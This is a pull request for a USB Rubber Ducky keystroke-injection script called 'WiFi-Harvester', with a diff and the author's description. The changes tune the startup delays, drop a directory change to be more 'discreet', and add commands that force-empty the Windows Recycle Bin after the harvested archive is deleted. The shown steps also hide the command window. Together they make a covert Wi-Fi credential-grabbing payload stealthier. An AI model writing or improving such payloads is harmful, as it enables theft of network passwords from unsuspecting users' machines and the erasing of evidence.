### PR TITLE
Update

### DIFF
--- a/wifi_grabber_rubberducky.txt
+++ b/wifi_grabber_rubberducky.txt
@@ -3,8 +3,7 @@ REM Author: tony
 REM Based on the code of: Siem TTommy
 REM: Version 1.1
 REM --> waits for windows to open file explorer and closes it other wise it might mess up script
-DELAY 7000 
-GUI DOWNARROW
+DELAY 7500 
 GUI d
 DELAY 150
 GUI r

--- a/wifi_grabber_rubberducky.txt
+++ b/wifi_grabber_rubberducky.txt
@@ -2,7 +2,9 @@ REM Title: WiFi-Harvester
 REM Author: tony
 REM Based on the code of: Siem TTommy
 REM: Version 1.1
-DELAY 2000
+REM --> waits for windows to open file explorer and closes it other wise it might mess up script
+DELAY 7000 
+GUI DOWNARROW
 GUI d
 DELAY 150
 GUI r
@@ -13,7 +15,6 @@ DELAY 500
 STRING color FE & mode con:cols=18 lines=1
 ENTER
 REM --> Harvest
-STRING cd Desktop
 ENTER
 STRING mkdir A
 ENTER
@@ -71,4 +72,10 @@ ENTER
 STRING S
 ENTER
 STRING del A.zip & exit
+ENTER
+STRING rmdir /s %systemdrive%\$Recycle.bin
+ENTER
+STRING y
+ENTER
+STRING exit
 ENTER


### PR DESCRIPTION
I found that most PC's auto-open file explorer when ducky is plugged in messing up the script so I added a delay that should stop this from happening. Also, it doesn't need to cd to desktop as I find this is more "discreet"  and a lot of pcs go to one drive before desktop so this has a lot of potential for error. I also cleared the recycling bin and fixed deleting the files as windows askes for confirmation